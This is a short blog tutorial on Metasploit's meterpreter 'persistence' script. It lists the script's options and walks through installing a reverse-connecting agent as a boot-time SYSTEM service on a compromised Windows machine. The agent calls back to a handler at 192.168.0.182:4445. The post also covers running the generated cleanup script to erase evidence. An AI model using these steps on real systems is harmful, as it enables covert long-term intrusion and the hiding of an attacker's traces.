Owned for ever

Some days ago, I read something about the modules of meterpreter that one can execute once a machine has been compromised but I can't remember where I did it. So, I want to talk about the use of some of them.

First for all, we have a lot of scripts to run (about 180) and we can do some actions such as to collect the credentials stored in the system, or in the software installed.

There are other options one can do, and one this is the possibility to make our connection persistent and mantain that channel for future connections. In order to do that, we must use the "persistent" script. For see the options that it have, one must execute "run persistence -h":

Using that script, we create service on the compromissed machine that it will be ready every time the server will be rebooted.

To explain how it works, we must know the options it have:

-A Automatically start a matching multi/handler to connect to the agent

-L Location in target host where to write payload to, if none %TEMP% will be used.

-P Payload to use, default is windows/meterpreter/reverse_tcp.

-S Automatically start the agent on boot as a service (with SYSTEM privileges)

-T Alternate executable template to use

-U Automatically start the agent when the User logs on

-X Automatically start the agent when the system boots

-h This help menu

-i The interval in seconds between each connection attempt

-p The port on the remote host where Metasploit is listening

-r The IP of the system running Metasploit listening for the connect back

I will use the options "-A", "-S", "-X", "-p 4445" and "-r 192.168.0.182". As we can see on the following image, a new session has been created, and also we can see where the vbs script has been stored and executed with a new process ID (PID).

If we want to proof if the channel is persistent now, we must reboot the owned computer, so the active sessions will be died and when the computer has been loaded it will try to connect to our multihandler.

In order to clean our evidences, we must delete the files created, and kill the current process. For do that, whe we run for the first time the "persistent" script, a cleaning script has been created on /root/.msf4/logs/persistence/*.rc, so we must to change the PID on the script and put it as the last command to execute because if we run that before the other commands, the conection will be died, and will not be possible to delete the key on the register.

At last, we must run the "resource" command for meterpreter to execute the cleaning script.

It is possible to obtain some errors when we run the resource command, but only the accepted errors are when tring to delete the payload created on the system (only, if we didn't change the path and the script was created on the %TEMP% directory because when the machine will be rebooted, the script will be deleted), and the error when tring to kill the Process, for the same reason.